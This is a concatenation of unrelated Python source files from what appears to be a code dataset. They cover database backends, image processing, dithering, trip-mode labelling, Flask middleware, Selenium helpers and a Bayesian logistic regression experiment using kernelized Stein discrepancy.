async def execute(self, query: Query):
q = self._compile(query)
await self.db.execute(q["query"], q["values"])
async def fetch(self, query: Query) -> Dict[str, Any]:
q = self._compile(query)
cursor = await self.db.execute(q["query"], q["values"])
res = await cursor.fetchone()
await cursor.close()
return dict(res)
async def fetch_all(self, query: Query) -> List[Dict[str, Any]]:
q = self._compile(query)
cursor = await self.db.execute(q["query"], q["values"])
res = await cursor.fetchall()
await cursor.close()
return [dict(r) for r in res]
def transaction(self) -> "TransactionBackend":
return SQLiteTransaction(self)
class SQLiteTransaction(TransactionBackend):
async def start(self):
# Nothing to do
return
async def commit(self):
await self._connection.database.commit()
async def rollback(self):
await self._connection.database.rollback()
|
4,823 | b8c7aa5ff7387eacb45d996fa47186d193b44782 | import re
def find_all_links(text):
result = []
iterator = re.finditer(r"https?\:\/\/(www)?\.?\w+\.\w+", text)
for match in iterator:
result.append(match.group())
return result |
4,824 | a1b579494d20e8b8a26f7636ebd444252d2aa250 | # Parsing the raw.csv generated by running lis2dh_cluster.py
g = 9.806
def twos_complement(lsb, msb):
signBit = (msb & 0b10000000) >> 7
msb &= 0x7F # Strip off sign bit
if signBit:
x = (msb << 8) + lsb
x ^= 0x7FFF
x = -1 - x
else:
x = (msb << 8) + lsb
x = x>>6 # Remove left justification of data
return x
offset = 'not_set'
with open('raw.csv', 'r') as infile:
with open('parsed.csv', 'a') as outfile:
# Read the first line (the column headers)
headers = infile.readline().strip('\n\r')
headers = headers.split(';')
newheaders = []
for header in headers:
if header == 't': newheaders += ['t']
else: newheaders += [header+'x', header+'y', header+'z']
newheaders = ','.join(newheaders)
outfile.write(newheaders + '\n')
# Read and parse all sequential lines
line_in = infile.readline().strip('\n\r')
while line_in:
line_out = ''
data = line_in.split(';')
timestamp = eval(data[0])
if offset == 'not_set':
offset = timestamp
line_out += str(timestamp - offset)
for accel in data[1:]:
array = eval(accel) # Quick and dirty way of converting string to array
line_out += ','
line_out += str(twos_complement(array[0], array[1]))
line_out += ','
line_out += str(twos_complement(array[2], array[3]))
line_out += ','
line_out += str(twos_complement(array[4], array[5]))
line_out += '\n'
outfile.write(line_out)
try:
line_in = infile.readline().strip('\n\r')
except:
pass |
4,825 | 97656bca3ce0085fb2f1167d37485fb7ee812730 | ##class Human:
## pass
##hb1-HB("Sudhir")
##hb2=HB("Sreenu")
class Student:
def __init__(self,name,rollno):
self.name=name
self.rollno=rollno
std1=Student("Siva",123)
|
4,826 | 1f345a20343eb859cb37bf406623c0fc10722357 | from __future__ import print_function
import argparse
import torch
import torch.nn as nn
import torch.optim as optim
import random
from utils.misc import *
from utils.adapt_helpers import *
from utils.rotation import rotate_batch, rotate_single_with_label
from utils.model import resnet18
from utils.train_helpers import normalize, te_transforms
from utils.test_helpers import test
device = 'cuda' if torch.cuda.is_available() else 'cpu'
classes = ('plane', 'car', 'bird', 'cat',
'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
parser = argparse.ArgumentParser()
parser.add_argument('--dataroot', default='data/CIFAR-10-C/')
parser.add_argument('--shared', default=None)
########################################################################
parser.add_argument('--depth', default=18, type=int)
parser.add_argument('--group_norm', default=32, type=int)
parser.add_argument('--batch_size', default=32, type=int)
parser.add_argument('--workers', default=8, type=int)
########################################################################
parser.add_argument('--lr', default=0.001, type=float)
parser.add_argument('--niter', default=1, type=int)
parser.add_argument('--online', action='store_true')
parser.add_argument('--shuffle', action='store_true')
parser.add_argument('--threshold', default=1, type=float)
parser.add_argument('--epsilon', default=0.2, type=float)
parser.add_argument('--dset_size', default=0, type=int)
########################################################################
parser.add_argument('--resume', default=None)
parser.add_argument('--outf', default='.')
parser.add_argument('--epochs', default=10, type=int)
args = parser.parse_args()
args.threshold += 0.001 # to correct for numeric errors
my_makedir(args.outf)
import torch.backends.cudnn as cudnn
cudnn.benchmark = True
def gn_helper(planes):
return nn.GroupNorm(args.group_norm, planes)
norm_layer = gn_helper
net = resnet18(num_classes = 10, norm_layer=norm_layer).to(device)
net = torch.nn.DataParallel(net)
print('Resuming from %s...' %(args.resume))
ckpt = torch.load('%s/best.pth' %(args.resume))
net.load_state_dict(ckpt['net'])
print("Starting Test Error: %.3f" % ckpt['err_cls'])
criterion = nn.CrossEntropyLoss().to(device)
optimizer = optim.SGD(net.parameters(), lr=args.lr)
trset, trloader = prepare_train_data(args)
teset, teloader = prepare_test_data(args)
print("Lethean Attack")
for i in range(args.epochs):
idx = random.randint(0, len(trset) - 1)
img, lbl = trset[idx]
random_rot = random.randint(1, 3)
rot_img = rotate_single_with_label(img, random_rot)
adapt_single_tensor(net, rot_img, optimizer, criterion, args.niter, args.batch_size)
if i % 50 == 49:
print("%d%%" % ((i + 1) * 100 / 5000))
err_cls, correct_per_cls, total_per_cls = test(teloader, net, verbose=True, print_freq=0)
print("Epoch %d Test error: %.3f" % (i, err_cls))
|
4,827 | c8137aacfb0f35c9630515442d5bdda870e9908a | # Getting familiar with OOP and using Functions and Classes :)
class Dog():
species = 'mammal'
def __init__(self,breed,name):
self.breed = breed
self.name = name
def bark(self,number):
print(f'Woof! My name is {self.name} and the number is {number}')
my_dog = Dog('Corgi','RTZY')
print(type(my_dog))
print(my_dog.breed)
print(my_dog.name)
my_dog.bark(10)
class Circle():
pi = 3.14
def __init__(self,radius = 1):
self.radius = radius
self.area = radius * radius * Circle.pi
def get_circumference(self):
return (self.radius * Circle.pi) * 2
my_circle = Circle(30)
print(my_circle.area)
test = my_circle.get_circumference()
print(test)
class Animal():
def __init__(self):
print('Animal Created')
def who_am_i(self):
print('I am an animal')
def eat(self):
print('I am eating')
print('\n')
class Dog(Animal):
def __init__(self):
Animal.__init__(self)
print('Dog Created')
def bark(self):
print('Woof! Woof!')
mydog = Dog()
print(mydog.bark()) |
4,828 | 6bb7dafea73aff7aca9b0ddc1393e4db6fcf0151 | import numpy as np
#1
def longest_substring(string1,string2):
mat=np.zeros(shape=(len(string1),len(string2)))
for x in range(len(string1)):
for y in range(len(string2)):
if x==0 or y==0:
if string1[x]==string2[y]:
mat[x,y]=1
else:
if string1[x]==string2[y]:
mat[x,y]=mat[x-1,y-1]+1
agmx=np.argmax(mat)
iofagmx=np.unravel_index(agmx,mat.shape)
numbofstr=int(np.max(mat))
endstring=string1[iofagmx[0]-numbofstr+1:iofagmx[0]+1]
return endstring
if __name__ == '__main__':
assert longest_substring("jsanad","anasc") == "ana"
assert longest_substring("ilovebioinformatics","icantwaitformax") == "forma"
assert longest_substring("ironmansaregreat","triathlonforever") == "on"
assert longest_substring("ihatewalking","nobikenolife") == "i"
assert longest_substring("gofaster","govegan") == "go"
|
4,829 | d8da01433b2e6adb403fdadc713d4ee30e92c787 | from application.identifier import Identifier
if __name__ == '__main__':
idf = Identifier()
while raw_input('Hello!, to start listening press enter, to exit press q\n') != 'q':
idf.guess()
|
4,830 | a2aa615ac660f13727a97cdd2feaca8f6e457da4 | #!/usr/bin/env python
from application import app
import pprint
import sys
URL_PREFIX = '/pub/livemap'
class LoggingMiddleware(object):
def __init__(self, app):
self._app = app
def __call__(self, environ, resp):
errorlog = environ['wsgi.errors']
pprint.pprint(('REQUEST', environ), stream=errorlog)
def log_response(status, headers, *args):
pprint.pprint(('RESPONSE', status, headers), stream=errorlog)
return resp(status, headers, *args)
return self._app(environ, log_response)
class ScriptNameEdit(object):
def __init__(self, app):
self.app = app
def __call__(self, environ, start_response):
url = environ['SCRIPT_NAME']
environ['wsgi.url_scheme'] = 'https'
environ['SCRIPT_NAME'] = URL_PREFIX + url
return self.app(environ, start_response)
if '-l' not in sys.argv:
# app.wsgi_app = LoggingMiddleware(app.wsgi_app)
app.wsgi_app = ScriptNameEdit(app.wsgi_app)
application = app
if __name__ == "__main__":
app.run(host='0.0.0.0', threaded=True)
|
4,831 | 371c1c9e3ccf7dae35d435bdb013e0462f3add5d | from PIL import Image, ImageFilter
import numpy as np
import glob
from numpy import array
import matplotlib.pyplot as plt
from skimage import morphology
import scipy.ndimage
def sample_stack(stack, rows=2, cols=2, start_with=0, show_every=1, display1 = True):
if (display1):
new_list = []
new_list.append(stack)
new_list.append(stack)
new_list.append(stack)
new_list.append(stack)
sample_stack(new_list, 2, 2, 0, 1, False)
else:
fig,ax = plt.subplots(rows,cols,figsize=[12,12])
for i in range((rows*cols)):
ind = start_with + i*show_every
ax[int(i/rows),int(i % rows)].set_title('slice %d' % ind)
ax[int(i/rows),int(i % rows)].imshow(stack[ind],cmap='gray')
ax[int(i/rows),int(i % rows)].axis('off')
plt.show()
"""
datapath = "jpg_images/"
img0 = Image.open("jpg_images/maskedimage" + str(0) + ".jpg")
counter = 0
img1 = []
for f in glob.glob('/Users/paulmccabe/Desktop/jpg images/*.jpg'):
path = "jpg_images/maskedimage" + str(counter) + ".jpg"
img0 = Image.open(path).convert('L')
img1.append(array(img0))
counter += 1
print("Counter: " + str(counter))
imgs_to_process_orig = np.stack([s for s in img1])
"""
id = 2
imgs = np.load("/Users/paulmccabe/Desktop/Segmentation Project/" + "justmask_%d.npy" % (id))
counter = 0
print("Saving as jpg Images...")
for img in imgs:
scipy.misc.imsave('/Users/paulmccabe/Desktop/Segmentation Project' + '/jpg mask images/justmask{}.jpg'.format(counter), img)
counter += 1
counter = 0
#print("Re-Importing jpg Images...")
#for f in glob.glob('/Users/paulmccabe/Desktop/Segmentation Project/jpg mask images/*.jpg'):
# path = "jpg_images/maskedimage" + str(counter) + ".jpg"
# img0 = Image.open(path).convert('L')
# img1.append(array(img0))
# counter += 1
imgs[imgs == 1] = 255
list = []
for img in imgs:
PIL_img = Image.fromarray(img.astype('uint8'))
PIL_edge = PIL_img.filter(ImageFilter.FIND_EDGES)
np_img = array(PIL_edge)
dilation = morphology.dilation(np_img, np.ones([4,4]))
list.append(dilation)
imgs_after_processing = np.stack([s for s in list])
np.save("/Users/paulmccabe/Desktop/Segmentation Project" + "/justedge_%d.npy" % (id), imgs_after_processing[:284])
#sample_stack(np_img) |
4,832 | 0a23b16329d8b599a4ee533604d316bdfe4b579a | from selenium.webdriver.common.keys import Keys
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
# driver = webdriver.Chrome('C:/automation/chromedriver')
# wait = WebDriverWait(driver, 15)
class Methodos(object):
def __init__(self,driver):
self.driver=driver
self.wait=WebDriverWait(self.driver, 15)
def SendText(self, _id, text):
e = self.wait.until(EC.element_to_be_clickable(By.ID, _id))
e.clear()
e.send_keys(text)
self.driver.implicitly_wait(5)
def Click(self, id):
e = self.wait.until(EC.element_to_be_clickable((By.ID, id)))
e.click()
def GetElementId(self,idtext):
return self.wait.until(EC.element_to_be_clickable(By.ID,idtext))
# def SendText(driver,wait,_id,text):
# e= wait.until(EC.element_to_be_clickable(By.ID,_id))
# e.clear()
# e.send_keys(text)
# driver.implicitly_wait(5)
# def Click(driver,wait,id):
# e=wait.until(EC.element_to_be_clickable((By.ID,id)))
# e.click()
|
4,833 | 3f4e8402bbd096a33ed159ca0fed250c74c2f876 | def label_modes(trip_list, silent=True):
"""Labels trip segments by likely mode of travel.
Labels are "chilling" if traveler is stationary, "walking" if slow,
"driving" if fast, and "bogus" if too fast to be real.
trip_list [list]: a list of dicts in JSON format.
silent [bool]: if True, does not print reports.
Returns list of dicts in JSON format."""
if silent == False:
print('Preparing to label modes of travel for ' \
+ str(len(trip_list)) + ' trips.')
loop_counter = 0
loop_size = len(trip_list)
for doc in trip_list:
if silent == False:
loop_counter = loop_counter + 1
if loop_counter % 10000 == 0:
print('Labeling modes. Finished ' + str(loop_counter) \
+ ' trips.')
time_spent_driving = 0
time_spent_walking = 0
time_spent_chilling = 0
time_spent_bogus = 0
for i in range(1,len(doc['reduction'])):
if (float(doc['reduction'][i]['velocity']) >= 2.3):
doc['reduction'][i]['mode'] = 'driving'
elif (float(doc['reduction'][i]['velocity']) < 2.3 and float(doc['reduction'][i]['velocity']) > 0):
doc['reduction'][i]['mode'] = 'walking'
elif (float(doc['reduction'][i]['velocity']) == 0.0):
doc['reduction'][i]['mode'] = 'chilling'
if (float(doc['reduction'][i]['velocity']) > 22.22):
doc['reduction'][i]['mode'] = 'bogus'
for i in range(1,len(doc['reduction']) - 1):
path_length = 0
if (doc['reduction'][i]['mode'] == 'driving'):
for j in range(i+1,len(doc['reduction'])):
last_intersection_id = doc['reduction'][j]['IntersectionID']
if (doc['reduction'][j]['mode'] == 'walking'): path_length = path_length + 1
elif (doc['reduction'][j]['mode'] == 'driving' or doc['reduction'][j]['mode'] == 'bogus'): break
if (path_length > 5 or last_intersection_id == doc['reduction'][i]['IntersectionID']):
for k in range(i+1,j):
if (doc['reduction'][k]['mode'] != 'chilling'): doc['reduction'][k]['mode'] = 'walking'
else :
for k in range(i+1,j):
if (doc['reduction'][k]['mode'] != 'chilling'): doc['reduction'][k]['mode'] = 'driving'
if (doc['reduction'][i]['mode'] == 'driving'): time_spent_driving = time_spent_driving + float(doc['reduction'][i]['time']) - float(doc['reduction'][i-1]['time'])
elif (doc['reduction'][i]['mode'] == 'walking'): time_spent_walking = time_spent_walking + float(doc['reduction'][i]['time']) - float(doc['reduction'][i-1]['time'])
elif (doc['reduction'][i]['mode'] == 'chilling'): time_spent_chilling = time_spent_chilling + float(doc['reduction'][i]['time']) - float(doc['reduction'][i-1]['time'])
elif (doc['reduction'][i]['mode'] == 'bogus'): time_spent_bogus = time_spent_bogus + float(doc['reduction'][i]['time']) - float(doc['reduction'][i-1]['time'])
if (doc['reduction'][-1]['mode'] == 'driving'): time_spent_driving = time_spent_driving + float(doc['reduction'][-1]['time']) - float(doc['reduction'][-2]['time'])
elif (doc['reduction'][-1]['mode'] == 'walking'): time_spent_walking = time_spent_walking + float(doc['reduction'][-1]['time']) - float(doc['reduction'][-2]['time'])
elif (doc['reduction'][-1]['mode'] == 'chilling'): time_spent_chilling = time_spent_chilling + float(doc['reduction'][-1]['time']) - float(doc['reduction'][-2]['time'])
elif (doc['reduction'][-1]['mode'] == 'bogus'): time_spent_bogus = time_spent_bogus + float(doc['reduction'][-1]['time']) - float(doc['reduction'][-2]['time'])
duration_of_trip = float(doc['duration_of_trip'])
doc['time_percentage_driving'] = str(time_spent_driving/duration_of_trip*100)
doc['time_percentage_walking'] = str(time_spent_walking/duration_of_trip*100)
doc['time_percentage_chilling'] = str(time_spent_chilling/duration_of_trip*100)
doc['time_percentage_bogus'] = str(time_spent_bogus/duration_of_trip*100)
if silent == False:
print('Done labeling mode of travel. Returning list of length ' \
+ str(len(trip_list)) + '.')
return trip_list |
4,834 | 1f7007fcea490a8b28bd72163f99b32e81308878 | # -*- coding: utf-8 -*-
"""
Created on Wed Mar 22 19:29:50 2017
@author: marcos
"""
from sklearn.cluster import KMeans
from sklearn.utils import shuffle
from classes.imagem import Imagem
import numpy as np
def mudaCor(img, metodo='average', nTons=256):
nova = Imagem((img.altura, img.largura))
for x in range(img.largura):
for y in range(img.altura):
r,g,b = img[y][x]
if metodo == 'average':
avg = (r + g + b) / 3.0
nova[y][x] = (avg, avg, avg)
elif metodo == 'r':
nova[y][x] = (r,r,r)
elif metodo == 'inv':
nova[y][x] = (255-r, 255-g, 255-b)
else:
nova[y][x] = (r,g,b)
return nova
def balanco(img, ar, ag, ab):
nova = Imagem((img.altura, img.largura))
for y in range(img.altura):
for x in range(img.largura):
r,g,b = img[y][x]
R = int(ar*r)
G = int(ar*g)
B = int(ar*b)
nova[y][x] = (R,G,B)
return nova
def binaria(img):
nova = img.copia()
dados = img.arrLin()
paleta = [[0,0,0], [255,255,255]]
nClusters = 2
amostraAleatoria = shuffle(dados, random_state=0)[:1000]
km = KMeans(nClusters).fit(amostraAleatoria)
labels = km.predict(dados)
for x,label in enumerate(labels):
i = x // img.largura
j = x % img.largura
r,g,b = paleta[label]
nova[i][j] = (r,g,b)
return nova
def propaga(tup, fator):
r,g,b = tup
return (r + fator, g + fator, b + fator)
# Floyd-Steinberg Dithering
def floyd(img):
nova = mudaCor(img, 'average') # Mudar para luminosity, apos implementacao
for y in range(img.altura):
for x in range(img.largura):
r,g,b = nova[y][x]
if r >= 255//2:
nova[y][x] = (255, 255, 255)
else:
nova[y][x] = (0, 0, 0)
quantErro = r - nova[y][x][0]
if x+1 < img.largura:
nova[y][x+1] = propaga(nova[y][x+1], quantErro * 7/16)
if y+1 < img.altura:
if x-1 >= 0:
nova[y+1][x-1] = propaga(nova[y+1][x-1], quantErro * 3/16)
nova[y+1][x] = propaga(nova[y+1][x], quantErro * 5/16)
if x+1 < img.largura:
nova[y+1][x+1] = propaga(nova[y+1][x+1], quantErro * 1/16)
return nova
# Ordered Dithering com matriz de Bayer
def bayer(img):
matriz = np.array([[0,60], [45, 110]])
dim = matriz.shape[0]
nova = Imagem((img.altura, img.largura))
for y in range(img.altura):
for x in range(img.largura):
r,g,b = img[y][x]
Y = (r + g + b) / 3.0 # Mudar para luminancia (luminosity) apos implementado
if Y > matriz[y % dim][x % dim]:
nova[y][x] = (255, 255, 255)
else:
nova[y][x] = (0, 0, 0)
return nova |
4,835 | 9b8b196e1ad845ab745dabe5abe3be7bea0d5695 | import csv
import sqlite3
import time
from datetime import datetime, timedelta
import pandas as pd
import pytz
import json
import urllib
import numpy as np
DATABASE = '/var/www/html/citibikeapp/citibikeapp/citibike_change.db'
def execute_query(cur,query, args=()):
cur = cur.execute(query, args)
rows = cur.fetchall()
# cur.close()
return rows
def convertTime(et):
"""'2017-06-01 11:41:53 AM' to '2017-06-01 11:41:53' """
hour = int(et[11:13])
if et.find('PM') != -1 and hour != 12:
dateString = et[:10]
hour = hour + 12
et = dateString + ' ' + str(hour) + et[13:19]
elif et.find('AM') != -1 and hour == 12:
dateString = et[:10]
hour = 0
et = dateString + ' ' + '0'+str(hour) + et[13:19]
else:
et = et[:19]
return et
def getNYtimenow():
tz = pytz.timezone('America/New_York')
time = str(datetime.now(tz))[:19]
return time
def datetimeStringToObject(timeString):
"""convert a string in format YYYY-MM-DD hh:mm:ss to a datetime object"""
try:
year = int(timeString[:4])
month = int(timeString[5:7])
day = int(timeString[8:10])
hour = int(timeString[11:13])
minute = int(timeString[14:16])
result = datetime(year, month, day, hour, minute)
return result
except:
return None
def timeStringToObject(timeString):
"""convert a string in format hh:mm:ss to a datetime object with current date"""
try:
# year = datetime.now().year
# month = datetime.now().month
# day = datetime.now().day
hour = int(timeString[:2])
minute = int(timeString[3:5])
result = datetime.today().replace(hour=hour, minute=minute, second=0, microsecond=0)
return result
except:
return None
def notSignedIn(vID):
"""Return true is the drivers did not enter vehicle ID,
return False if the drivers have entered the vehicle ID"""
if str(vID) == '0':
return True
return False
def resetEstComp(cur, vID):
"""estimate completion time goes to 0"""
cur.execute("""UPDATE OpenTasks SET estComplete = null WHERE vID = ? """,[vID])
def getNextFixOrderNum(cur,vID):
"""return the integer which is one larger than the order number of the last fixed task"""
orderNum = execute_query(cur, """SELECT Count(*) FROM OpenTasks where vID = ? and fixTask = 1""", [vID])[0][0]
orderNum = int(orderNum) + 1
return orderNum
def getNextOrderNum(cur,vID):
"""return the integer which is one larger than the order number of the last task"""
orderNum = execute_query(cur,"""SELECT Count(*) FROM OpenTasks where vID = ?""", [vID])[0][0]
orderNum = int(orderNum) + 1
return orderNum
def fixOrderBeforeInsert(cur,vID,orderNum):
"""Increment later tasks' order number by 1, orderNum is the order of the inserted task
should be called before inserting the task """
cur.execute("""UPDATE OpenTasks SET orderNum = orderNum + 1 WHERE vID = ? and orderNum >= ?""",[vID, orderNum]) |
4,836 | 7c9b51ae7cde9c3a00888dac6df710b93af6dd7f | import os
import time
import re
import json
from os.path import join, getsize
from aiohttp import web
from utils import helper
TBL_HEAD = '''
<table class="table table-striped table-hover table-sm">
<thead>
<tr>
<th scope="col">Directory</th>
<th scope="col">Size</th>
</tr>
</thead>
<tbody>
'''
TBL_FOOTER = '''
</tbody>
</table>
'''
def stats_count_info(request):
root_path = request.app['PATH-DB']
cpt = 0
d = dict()
dirs_data = dict()
for root, dirs, files in os.walk(root_path, topdown=False):
cpt += len(files)
size = sum(getsize(join(root, name)) for name in files)
subdir_size = sum(dirs_data[join(root,d)] for d in dirs)
size = dirs_data[root] = size + subdir_size
if root.find('.meta') != -1:
# we ignore (internal) meta directories
continue
d[root] = size
ret = ''
ret += "<h2>Files Count</h2>Number of files: {}<br /><br />".format(cpt)
ret += "<h2>Disk Consumption</h2>"
ret += "Database disk consumption overall: {} MB<br /><br />".format(d[root_path] // (1024*1024))
ret += "<h4>Resouce Usage Listed by Objects</h4><br />"
ret += TBL_HEAD
for k in sorted(d, key=d.get, reverse=True):
ret += '<tr>'
ret += "<td>{}</td><td>{}</td>".format(k, d[k])
ret += TBL_FOOTER
return ret
def generate_disk_info_page(request):
page = request.app['BLOB-HEADER']
page += stats_count_info(request)
page += request.app['BLOB-FOOTER']
return web.Response(body=page, content_type='text/html')
def handle(request):
return generate_disk_info_page(request)
|
4,837 | f70f4f093aa64b8cd60acbb846855ca3fed13c63 | # ""
# "deb_char_cont_x9875"
# # def watch_edit_text(self): # execute when test edited
# # logging.info("TQ : " + str(len(self.te_sql_cmd.toPlainText())))
# # logging.info("TE : " + str(len(self.cmd_last_text)))
# # logging.info("LEN : " + str(self.cmd_len))
# # if len(self.te_sql_cmd.toPlainText()) < self.cmd_len or \
# # self.te_sql_cmd.toPlainText().find(self.cmd_last_text) != 0:
# # # self.te_sql_cmd.setText(self.cmd_last_text) # not writch text
# #
# # # self.te_sql_cmd.setText(self.cmd_last_text) # Work but no text highLight
# # # after press backspace
# # # self.te_sql_cmd.setDocument(self.cmd_last_text_document)
# #
# # self.te_sql_cmd.setHtml(self.cmd_last_html_text)
# #
# # logging.info("TQ : " + str(len(self.te_sql_cmd.toPlainText())))
# # logging.info("TE : " + str(len(self.cmd_last_text)))
# #
# # tempCurs = self.te_sql_cmd.textCursor()
# # # tempCurs=QTextCursor()
# # # tempCurs.movePosition(QTextCursor.Right,QTextCursor.MoveAnchor,len(self.te_sql_cmd.toPlainText()))
# #
# # tempCurs.movePosition(QTextCursor.End, QTextCursor.MoveAnchor, 0)
# # self.te_sql_cmd.setTextCursor(tempCurs)
#
#
# #
# # import subprocess
# # proc = subprocess.Popen('cmd.exe', stdin = subprocess.PIPE, stdout = subprocess.PIPE)
# #
#
# app=QApplication(sys.argv)
# window=AbtTerminal()
#
# def my_commands_ana(command):
# if command == "cd":
# # return str(os.path.dirname(os.path.realpath(__file__))) # current file Directory
# return os.getcwd()
# if "cd" in command[:2] and len(command) > 2:
# dir_name = command[3:]
# try:
# os.chdir(dir_name)
# return '<h4>dir changed to</h4> <h4 style="color:rgb(0,230,120);">%s</h4>' % os.getcwd()
# except:
# return '<h4 style="color:red">Cant change current Directory To \n\t%s</h4>' % dir_name
# if "$$" in command[:2]:
# stdout, stderr = proc.communicate(bytes(str(command[2:]), 'UTF-8'))
# deleted_length_before=len("b'Microsoft Windows [Version 10.0.10586]\r\n(c) 2015 Microsoft Corporation. All rights reserved.\r\n\r\n")
# deleted_length_after=len(">More? '")
# # real_result=str(stdout)[deleted_length_before+4:len(str(stdout))-deleted_length_after]
# real_result=str(stdout.decode("utf-8")).replace("Microsoft Windows [Version 10.0.10586]\r\n(c) 2015 Microsoft Corporation. All rights reserved.\r\n\r\n","")
# real_result=real_result.replace(">More?","")
# print(real_result)
# return real_result
#
#
#
#
#
# ###############
# import subprocess
# cmdline = ["cmd", "/q", "/k", "echo off"]
# cmd = subprocess.Popen(cmdline, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
#
#
# if "$$" in command[:2]:
# batch = b"""\
# cd
# """
#
# # cmd.stdin.write(bytes(str(command[2:]), 'UTF-8'))
#
# cmd.stdin.write(batch)
# cmd.stdin.flush() # Must include this to ensure data is passed to child process
# result = cmd.stdout.read()
# return " "
|
4,838 | a0a9527268fb5f8ea24de700f7700b874fbf4a6b | """
SteinNS: BayesianLogisticRegression_KSD.py
Created on 10/9/18 6:25 PM
@author: Hanxi Sun
"""
import tensorflow as tf
import numpy as np
import scipy.io
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
########################################################################################################################
# Data
data = scipy.io.loadmat("data/covertype.mat")
X_input = data['covtype'][:, 1:]
y_input = data['covtype'][:, 0]
y_input[y_input == 2] = -1
N_all = X_input.shape[0]
X_input = np.hstack([X_input, np.ones([N_all, 1])])
d = X_input.shape[1]
X_dim = d + 1 # dimension of the target distribution
# split the data set into training and testing
X_train, X_test, y_train, y_test = train_test_split(X_input, y_input, test_size=0.2, random_state=21)
X_train_tf = tf.convert_to_tensor(X_train, dtype=tf.float64)
X_test_tf = tf.convert_to_tensor(X_test, dtype=tf.float64)
y_train_tf = tf.convert_to_tensor(y_train, dtype=tf.float64)
y_test_tf = tf.convert_to_tensor(y_test, dtype=tf.float64)
N = X_train.shape[0]
########################################################################################################################
# model parameters
lr = 4e-4 # learning rate
kernel = "rbf" # "rbf" or "imq" kernel
z_dim = 100
h_dim_g = 200
mb_size_x = 100 # date mini-batch size
mb_size = 100 # sample mini-batch size
n_iter = 200000
iter_eval = 1000
optimizer = tf.train.RMSPropOptimizer
########################################################################################################################
# network
tf.reset_default_graph()
initializer = tf.contrib.layers.xavier_initializer()
Xs = tf.placeholder(tf.float64, shape=[None, d])
ys = tf.placeholder(tf.float64, shape=[None])
z = tf.placeholder(tf.float64, shape=[None, z_dim])
G_W1 = tf.get_variable('g_w1', [z_dim, h_dim_g], dtype=tf.float64, initializer=initializer)
G_b1 = tf.get_variable('g_b1', [h_dim_g], dtype=tf.float64, initializer=initializer)
G_W2 = tf.get_variable('g_w2', [h_dim_g, h_dim_g], dtype=tf.float64, initializer=initializer)
G_b2 = tf.get_variable('g_b2', [h_dim_g], dtype=tf.float64, initializer=initializer)
G_W3 = tf.get_variable('g_w3', [h_dim_g, X_dim], dtype=tf.float64, initializer=initializer)
G_b3 = tf.get_variable('g_b3', [X_dim], dtype=tf.float64, initializer=initializer)
theta_G = [G_W1, G_b1, G_W2, G_b2, G_W3, G_b3]
########################################################################################################################
# functions & structures
def sample_z(m, n, sd=10.):
return np.random.normal(0, sd, size=[m, n])
def S_q(theta, a0=1, b0=0.01):
# Reference:
# https://github.com/DartML/Stein-Variational-Gradient-Descent/blob/master/python/bayesian_logistic_regression.py
w = theta[:, :-1] # (m, d)
s = tf.reshape(theta[:, -1], shape=[-1, 1]) # (m, 1); alpha = s**2
y_hat = 1. / (1. + tf.exp(- tf.matmul(Xs, tf.transpose(w)))) # (mx, m); shape(Xs) = (mx, d)
y = tf.reshape((ys + 1.) / 2., shape=[-1, 1]) # (mx, 1)
dw_data = tf.matmul(tf.transpose(y - y_hat), Xs) # (m, d)
dw_prior = - s**2 * w # (m, d)
dw = dw_data * N / mb_size_x + dw_prior # (m, d)
w2 = tf.reshape(tf.reduce_sum(tf.square(w), axis=1), shape=[-1, 1]) # (m, 1); = wtw
ds = (2. * a0 - 2 + d) / s - tf.multiply(w2 + 2. * b0, s) # (m, 1)
return tf.concat([dw, ds], axis=1)
def rbf_kernel(x, dim=X_dim, h=1.):
# Reference 1: https://github.com/ChunyuanLI/SVGD/blob/master/demo_svgd.ipynb
# Reference 2: https://github.com/yc14600/svgd/blob/master/svgd.py
XY = tf.matmul(x, tf.transpose(x))
X2_ = tf.reshape(tf.reduce_sum(tf.square(x), axis=1), shape=[tf.shape(x)[0], 1])
X2 = tf.tile(X2_, [1, tf.shape(x)[0]])
pdist = tf.subtract(tf.add(X2, tf.transpose(X2)), 2 * XY) # pairwise distance matrix
kxy = tf.exp(- pdist / h ** 2 / 2.0) # kernel matrix
sum_kxy = tf.expand_dims(tf.reduce_sum(kxy, axis=1), 1)
dxkxy = tf.add(-tf.matmul(kxy, x), tf.multiply(x, sum_kxy)) / (h ** 2) # sum_y dk(x, y)/dx
dxykxy_tr = tf.multiply((dim * (h**2) - pdist), kxy) / (h**4) # tr( dk(x, y)/dxdy )
return kxy, dxkxy, dxykxy_tr
def imq_kernel(x, dim=X_dim, beta=-.5, c=1.):
XY = tf.matmul(x, tf.transpose(x))
X2_ = tf.reshape(tf.reduce_sum(tf.square(x), axis=1), shape=[tf.shape(x)[0], 1])
X2 = tf.tile(X2_, [1, tf.shape(x)[0]])
pdist = tf.subtract(tf.add(X2, tf.transpose(X2)), 2 * XY) # pairwise distance matrix
kxy = (c + pdist) ** beta
coeff = 2 * beta * ((c + pdist) ** (beta-1))
dxkxy = tf.matmul(coeff, x) - tf.multiply(x, tf.expand_dims(tf.reduce_sum(coeff, axis=1), 1))
dxykxy_tr = tf.multiply((c + pdist) ** (beta - 2),
- 2 * dim * c * beta + (- 4 * beta ** 2 + (4 - 2 * dim) * beta) * pdist)
return kxy, dxkxy, dxykxy_tr
kernels = {"rbf": rbf_kernel,
"imq": imq_kernel}
Kernel = kernels[kernel]
def ksd_emp(x, ap=1, dim=X_dim):
sq = S_q(x, ap)
kxy, dxkxy, dxykxy_tr = Kernel(x, dim)
t13 = tf.multiply(tf.matmul(sq, tf.transpose(sq)), kxy) + dxykxy_tr
t2 = 2 * tf.trace(tf.matmul(sq, tf.transpose(dxkxy)))
n = tf.cast(tf.shape(x)[0], tf.float64)
# ksd = (tf.reduce_sum(t13) - tf.trace(t13) + t2) / (n * (n-1))
ksd = (tf.reduce_sum(t13) + t2) / (n ** 2)
return ksd
def generator(z):
G_h1 = tf.nn.tanh(tf.matmul(z, G_W1) + G_b1)
G_h2 = tf.nn.tanh(tf.matmul(G_h1, G_W2) + G_b2)
out = 10. * tf.matmul(G_h2, G_W3) + G_b3
return out
def evaluation(theta, X_t=X_test, y_t=y_test):
w = theta[:, :-1]
y = y_t.reshape([-1, 1])
coff = - np.matmul(y * X_t, w.T)
prob = np.mean(1. / (1 + np.exp(coff)), axis=1)
